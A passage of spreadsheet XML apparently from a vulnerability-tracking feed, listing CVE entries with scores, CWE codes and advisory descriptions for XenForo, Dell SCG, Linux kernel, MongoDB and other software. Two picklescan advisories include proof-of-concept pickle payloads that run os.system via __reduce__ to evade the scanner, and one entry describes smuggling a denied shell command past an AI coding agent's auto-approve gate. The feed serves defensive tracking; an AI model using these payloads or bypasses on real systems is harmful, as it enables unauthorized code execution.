      <c r="K436" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr"/>
      <c r="Q436" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a server-side request forgery vulnerability in the PayPal REST webhook handler that allows unauthenticated attackers to cause the server to make outbound HTTP requests to arbitrary destinations by supplying a crafted certificate URL in webhook headers without scheme, hostname, or allowlist validation. Attackers can submit a crafted POST to the PayPal webhook callback endpoint to reach internal network resources including cloud instance metadata services, potentially disclosing IAM credentials or enabling secondary internal service exploitation.</t>
        </is>
      </c>
      <c r="S436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79637</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr"/>
      <c r="Q437" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R437"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437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79637</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80134</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr"/>
      <c r="Q438" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Credentials vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80134</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81016</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr"/>
      <c r="Q439" s="5" t="inlineStr"/>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86/amd/pmc: Propagate SMU errors and validate S2D address
amd_stb_s2d_init() discards the return value of several S2D SMU commands.
When the SMU refuses a command (e.g. "SMU cmd failed. err: 0xff") the
failure is only noticed indirectly - if at all - and reported as -EIO,
masking the real error.
More seriously, the S2D_PHYS_ADDR_LOW/HIGH return values are ignored, so
on failure phys_addr_low/hi are left uninitialised and the assembled
address is passed straight to devm_ioremap().  When the SMU leaves them at
zero this maps physical address 0 and trips the ioremap-on-RAM warning:
  amd_pmc AMDI000B:00: SMU cmd failed. err: 0xff
  ioremap on RAM at 0x0000000000000000 - 0x0000000000ffffff
  WARNING: CPU: 13 PID: 4592 at arch/x86/mm/ioremap.c:...
Check the return value of each SMU command and propagate it, and reject a
zero physical address before calling devm_ioremap().</t>
        </is>
      </c>
      <c r="S439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81016</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82537</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr"/>
      <c r="Q440" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability that allows attackers to execute denied shell commands by exploiting a word-boundary mismatch in comment handling between the approval gate's shell parser and bash. Attackers can craft a command string with an allowlisted word immediately followed by a hash character, separator, and denied command to pass the approval gate while bash executes the denied command with the agent's auto-execute privileges on the developer's machine.</t>
        </is>
      </c>
      <c r="S440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89060</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr"/>
      <c r="Q441" s="5" t="inlineStr">
        <is>
          <t>CWE-551</t>
        </is>
      </c>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>A cross-namespace authorization flaw in multicluster-observability-addon allows a user with permission to modify a managed cluster’s ManagedClusterAddOn configuration to reference ClusterLogForwarder or OpenTelemetryCollector resources outside the permitted namespace. If those resources reference Secrets, the add-on may copy the referenced Secrets to the attacker-controlled managed cluster.</t>
        </is>
      </c>
      <c r="S441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89060</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89099</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr"/>
      <c r="Q442" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>A race condition in the document value layer of MongoDB Server can allow concurrent server threads to operate on the same internal memory without synchronization, leading to memory corruption. An authenticated user holding ordinary read-write privileges on a database may be able to trigger this condition over the normal client protocol, resulting in server termination and potential corruption of process memory with user-influenced content. Successful use of this issue may impact the confidentiality, integrity, and availability of the affected server process.</t>
        </is>
      </c>
      <c r="S442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89099</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89466</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr"/>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: qcom_battmgr: terminate the strings from firmware
The qcom_battmgr_sc8280xp_strcpy() takes a Pascal-style string when the
firmware sends one. Otherwise it copies all BATTMGR_STRING_LEN bytes and
leaves the destination without a terminator.
Those destinations are model_number, serial_number and oem_info, each
BATTMGR_STRING_LEN and declared next to each other. They go out to user
space as val-&gt;strval, which power_supply_format_property() prints with
"%s", so a firmware string that fills the whole field makes that read run
into the following members.
Use strscpy() so the copy always terminates, the way the SM8350 path
already does for the same field.</t>
        </is>
      </c>
      <c r="S443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89466</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89720</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr"/>
      <c r="Q444" s="5" t="inlineStr"/>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ubifs: fix out-of-bounds read in signature length check
ubifs_sb_verify_signature() bounds the on-disk ubifs_sig_node-&gt;len field
before handing the signature payload to verify_pkcs7_signature(), but the
check has the wrong sign:
	if (le32_to_cpu(signode-&gt;len) &gt; snod-&gt;len + sizeof(struct ubifs_sig_node))
The signature bytes start sizeof(struct ubifs_sig_node) (UBIFS_SIG_NODE_SZ,
64 bytes) into the node, so the payload is at most
	snod-&gt;len - sizeof(struct ubifs_sig_node)
bytes long. Adding the header size instead of subtracting it accepts a
declared length up to 2 * UBIFS_SIG_NODE_SZ larger than the node actually
holds -- past the end of c-&gt;sbuf, which is vmalloc(c-&gt;leb_size).
verify_pkcs7_signature() -&gt; pkcs7_parse_message() -&gt; asn1_ber_decoder()
is then handed that inflated length and reads beyond the allocation while
walking the DER headers. The node length comes straight from the mounted
image, so a crafted signed UBIFS image reaches this via
ubifs_read_superblock() before the signature is cryptographically checked.
snod-&gt;len is guaranteed to be &gt;= UBIFS_SIG_NODE_SZ by the node scanner
(c-&gt;ranges[UBIFS_SIG_NODE].min_len == UBIFS_SIG_NODE_SZ), so the corrected
subtraction cannot underflow. Legitimately signed images are unaffected: a
correct superblock never declares a signature longer than the node it is
embedded in.</t>
        </is>
      </c>
      <c r="S444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89720</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89743</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr"/>
      <c r="Q445" s="5" t="inlineStr"/>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
misc: nsm: bound the device-reported response length
nsm_sendrecv_msg_locked() stores the virtqueue used-ring length reported
by the NSM device into msg-&gt;resp.len without bounding it to the response
buffer. A malicious or buggy backend can report a length larger than the
response buffer; parse_resp_raw() then copies that many bytes out of the
fixed buffer to user space, disclosing adjacent kernel heap (an
out-of-bounds read). The request path already floors its length in
fill_req_raw(); the response path lacks the symmetric check.
Clamp the stored length to the size of the response buffer. Well-behaved
devices report no more than the posted buffer size, so conforming traffic
is unaffected.</t>
        </is>
      </c>
      <c r="S445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89743</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71348</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M446" s="5" t="inlineStr">
        <is>
          <t>0.0.28</t>
        </is>
      </c>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr"/>
      <c r="P446" s="5" t="inlineStr"/>
      <c r="Q446" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>### Summary
Using torch.utils._config_module.load_config function, which is a pytorch library function to execute remote pickle file.
### Details
The attack payload executes in the following steps:
First, the attacker crafts the payload by calling the torch.utils._config_module.load_config function via the __reduce__ method. Then the victim checks whether the pickle file is safe using the Picklescan library. Because the library fails to detect any dangerous functions, the victim decides to pickle.load() this malicious file, leading to remote code execution.
### PoC
```
import pickle
from torch.utils._config_module import ConfigModule
class Evil:
    def __reduce__(self):
        return (os.system, ('whoami',))
class EvilTorchUtilsConfigModuleLoadConfig:
    def __reduce__(self):
        evil_payload = pickle.dumps(Evil())
        return ConfigModule.load_config, (None, evil_payload)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446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71348</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71357</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M447" s="5" t="inlineStr">
        <is>
          <t>0.0.30</t>
        </is>
      </c>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr"/>
      <c r="P447" s="5" t="inlineStr"/>
      <c r="Q447" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>### Summary
Using idlelib.pyshell.ModifiedInterpreter.runcommand function, which is a built-in python library function to execute remote pickle file.
### Details
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcommand function in reduce method
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
### PoC
```
from idlelib.pyshell import ModifiedInterpreter
from types import SimpleNamespace
class EvilIdlelibPyshellModifiedInterpreterRuncommand:
    def __reduce__(self):
        payload = "__import__('os').system('whoami')"
        fake_self = SimpleNamespace(
            locals={},
            tkconsole=SimpleNamespace(executing=False),
            rpcclt=None,
            debugger=None
        )
        return ModifiedInterpreter.runcommand, (fake_self, payload)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447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71357</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62109</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr"/>
      <c r="Q448" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>Editor SQL Injection in Sky Addons for Elementor &lt;= 3.8.4 versions.</t>
        </is>
      </c>
      <c r="S448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62109</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62112</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr"/>
      <c r="Q449" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>Editor SQL Injection in Amelia &lt;= 2.4.9 versions.</t>
        </is>
      </c>
      <c r="S449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62112</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80943</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr"/>
      <c r="Q450" s="5" t="inlineStr"/>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtlwifi: rtl8192du: check QoS TID before indexing tids
rtl92du_tx_fill_desc() uses ieee80211_get_tid() to read the QoS TID
from the 802.11 header and then uses it as an index into
sta_entry-&gt;tids[]. ieee80211_get_tid() returns the low 4-bit QoS TID
value, so the result can be in the range 0..15.
rtlwifi only allocates MAX_TID_COUNT entries for sta_entry-&gt;tids[], and
MAX_TID_COUNT is 9. A QoS TID greater than 8 therefore indexes past the
aggregation state array. Keep the default RTL_AGG_STOP state for
out-of-range TIDs, matching rtl92cu_tx_fill_desc().
This issue was detected by our static analysis tool and confirmed by
manual audit. UBSAN validation for the same bug pattern reports an
array-index-out-of-bounds access with index 10 for type
'rtl_tid_data [9]'.</t>
        </is>
      </c>
      <c r="S450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80943</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90460</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
